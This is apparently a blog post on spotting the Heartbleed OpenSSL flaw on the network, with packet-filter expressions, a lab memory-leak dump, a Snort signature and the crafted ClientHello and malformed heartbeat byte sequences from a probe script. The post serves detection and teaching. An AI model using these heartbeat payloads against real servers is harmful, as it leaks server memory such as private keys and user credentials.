Network Detection of the Heartbleed Vulnerability

Network Capture and Detection

The Heartbleed vulnerability uses a software flaw in openssl, which uses a Heartbeat Request within SSL/TLS to expose up to 64KB of data on a Web server. In this demo, we probe for the vulnerability, and then capture the network packets. These are at:

https://dl.dropboxusercontent.com/u/40355863/heartbleed.zip

You can search for Heartbeart Request with:

tcp matches "\x18\x03"

heart01Figure 1: Heartbeat Request

If we follow the network trace, we see the memory capture coming back:

...........SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5...............
...
.........3.2.....E.D...../...A.................................I.........
.4.2...
...........
...................................#...........B...>..SM..Z..@..%.4..b.....G.L..Okd..m....................#......................0...0.............j..p].0
..*.H..
.....0.1.0
..U....ubuntu0..
140415192450Z.
240412192450Z0.1.0
..U....ubuntu0.."0
..*.H..
..........0..
......K...7.....Z....bQ.u(5..I'.QJ.......x.!7*H"+.EG..>b.gD.._.....{.R+/...q}.....g...yE.<=q..(.r........\.iI>.....v.yv.+..F#..U....L..#D[..6...L.F@h..0....j.U..\D.J.....{ke...
..s.N......^e...+.DV..?..O.~4.......
or.#...-....6....&..{..Y|R.f.
$>.k....S....0.........
0.0...U....0.0
..*.H..
..........R_...;...d...?Q.V.).YI.....vY...2a4.;.ubF..4.....H....&..w....u...y".=.2g..o7..}..]0......y5H.F..
k.T.v@B5..9".3..../Gb...u.7wm.[.....{.
9.......H...m..Z N.e....m.....E...g..y).q.5`...E(..U>".)......Hw.........:.E.p........s..C.).E/O.r...KNoW..^..l..........K...G...A.%.?y....x.7..H.......B...F.B.....&....4(.L..=.....]2....=.b.n.;..."\.k.J.....M..g9...y%.....~..JOL..=.A...J7O.Q...\)6.P.@...p.....[...{.........XS....o..b..v....e.. ...x..w.|..t..e..hM....^.u.>
..X|..c_...h...kl..A....j..3G....=.8........#pG..S.....L...}..j->=m..p.9....../k...$........:
t.S..........L.......t..E.8..F0h.................@....@..@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5...............
...
.........3.2.....E.D...../...A.................................I.........
.4.2...
...........
...................................#.......-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

If-Modified-Since: Tue, 15 Apr 2014 19:24:48 GMT

If-None-Match: "b1-4f719c0d83492-gzip"



.....U. .[D.)K.....................................................................

Snort detection

We can see that the TLS Heartbeat Request has a packet payload with a hexadecimal pattern of 0x18, 0x03, 0x02 and 0x00. With Snort, we can detect this pattern with a signature of:

alert tcp any any -> any 443 (msg:"Heartbeat request"; content:"|18 03 02 00|"; rawbytes;sid:100000)

Next running the vulnerabilty scan, we get an alert of:

[**] [1:100000:0] Heartbeat request [**]
[Priority: 0] 
04/16-13:03:11.524491 172.16.121.1:64670 -> 172.16.121.150:443
TCP TTL:64 TOS:0x0 ID:11426 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0xFBF142E1  Ack: 0x61B93B9D  Win: 0x2000  TcpLen: 32
TCP Options (3) => NOP NOP TS: 712292260 2460366

Detailed analysis

We can now perform a detailed analysis with:

The crafted packets sent are:

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')

hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')

Thus we can search for these packets using:

tcp matches "\x16\x03x02x00"

and then can view the result, which shows that the result is non-encrypted (as shown in Figure 3).

heart02Figure 3: Non-encrypted response to Heartbeat Request

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s